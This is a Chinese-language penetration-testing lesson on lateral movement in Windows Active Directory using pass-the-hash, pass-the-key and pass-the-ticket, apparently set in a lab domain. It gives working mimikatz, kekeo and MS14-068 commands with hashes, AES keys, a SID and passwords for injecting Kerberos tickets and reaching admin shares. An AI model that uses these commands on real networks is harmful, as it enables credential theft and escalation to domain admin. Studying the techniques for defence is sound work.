六十八：內網安全-域橫向PTH&PTK&PTT哈希票據傳遞

Kerberos協議具體工作方法，在域中，簡要介紹一下：
• 客戶機將明文密碼進行NTLM哈希,然后和時間戳一起加密(使用krbtgt密碼hash作為密鑰)，發送給kdc（域控），kdc對用戶進行檢測，成功之后創建TGT(Ticket-Granting Ticket)
• 將TGT進行加密簽名返回給客戶機器，只有域用戶krbtgt才能讀取kerberos中TGT數據
• 然后客戶機將TGT發送給域控制器KDC請求TGS（票證授權服務）票證，並且對TGT進行檢測
• 檢測成功之后，將目標服務賬戶的NTLM以及TGT進行加密，將加密后的結果返回給客戶機。

PTH （pass the hash） 利用lm或者ntlm的值進行的滲透測試
PTT （pass the ticket） 利用的票據憑證TGT進行的滲透測試
PTK （pass the key） 利用的ekeys aes256進行的滲透測試

PTH在內網滲透中是一種很經典的攻擊方式，原理就是攻擊者可以直接通過LM Hash

和NTLM Hash遠程訪問主機或者服務，而不提供明文密碼

如果禁用了ntlm認證，PsExec無法利用獲得的ntlm hash進行遠程連接，但是使用mimikatz還是可以攻擊成功。對於8.1/2012r2，安裝補丁kb2871997的Win 7/2008r2/8/2012等，可以使用AES keys代替NT hash來實現ptk攻擊,
總結：KB2871997補丁后的影響
pth：沒打補丁用戶都可以連接，打了補丁只能administrator連接
ptk：打了補丁才能用戶都可以連接，采用aes256連接
https://www.freebuf.com/column/220740.html

PTT攻擊的部分就不是簡單的NTLM認證了，它是利用Kerberos協議進行攻擊的，這里就介紹三種常見的攻擊方法：MS14-068，Golden ticket，SILVER ticket，簡單來說就是將連接合法的票據注入到內存中實現連接。

MS14-068基於漏洞，Golden ticket(黃金票據)，SILVER ticket(白銀票據)
其中Golden ticket(黃金票據)，SILVER ticket(白銀票據)屬於權限維持技術
MS14-068造成的危害是允許域內任何一個普通用戶，將自己提升至域管權限。微軟給出的補丁是kb3011780

• 域橫向移動PTH傳遞-Mimikatz
• 域橫向移動PTK傳遞-Mimikatz
• 域橫向移動PTT傳遞-MS14068&kekeo&local
• 國產Ladon內網殺器測試驗收-信息收集,連接等
案例1-域橫向移動PTH傳遞-mimikatz
PTH ntlm傳遞
未打補丁下的工作組及域連接：
sekurlsa::pth /user:administrator /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:518b98ad4178a53695dc997aa02d455c
sekurlsa::pth /user:boss /domain:god /ntlm:ccef208c6485269c20db2cad21734fe7

\OWA2010CN-God.god.org
案例2-域橫向移動PTK傳遞-mimikatz
PTK aes256傳遞
打補丁后的工作組及域連接：
sekurlsa::ekeys #獲取aes
sekurlsa::pth /user:mary /domain:god /aes256:d7c1d9310753a2f7f240e5b2701dc1e6177d16a6e40af3c5cdff814719821c4b

案例3-域橫向移動PTT傳遞-ms14068&kekeo&本地

第一種利用漏洞：
能實現普通用戶直接獲取域控system權限

MS14-068 powershell執行

1.查看當前sid whoami/user
2.mimikatz # kerberos::purge
//清空當前機器中所有憑證，如果有域成員憑證會影響憑證偽造
mimikatz # kerberos::list //查看當前機器憑證
mimikatz # kerberos::ptc 票據文件 //將票據注入到內存中
3.利用ms14-068生成TGT數據
ms14-068.exe -u 域成員名@域名 -s sid -d 域控制器地址 -p 域成員密碼
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45
4.票據注入內存
mimikatz.exe "kerberos::ptc TGT_mary@god.org.ccache" exit
5.查看憑證列表 klist
6.利用
dir \192.168.3.21\c$
第二種利用工具kekeo
1.生成票據
kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c"
2.導入票據
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
3.查看憑證 klist
4.利用net use載入
dir \192.168.3.21\c$
第三種利用本地票據(需管理權限)
sekurlsa::tickets /export
kerberos::ptt xxxxxxxxxx.xxxx.kirbi
總結：ptt傳遞不需本地管理員權限，連接時主機名連接，基於漏洞,工具,本地票據

案例4-國產Ladon內網殺器測試驗收

信息收集-協議掃描-漏洞探針-傳遞攻擊等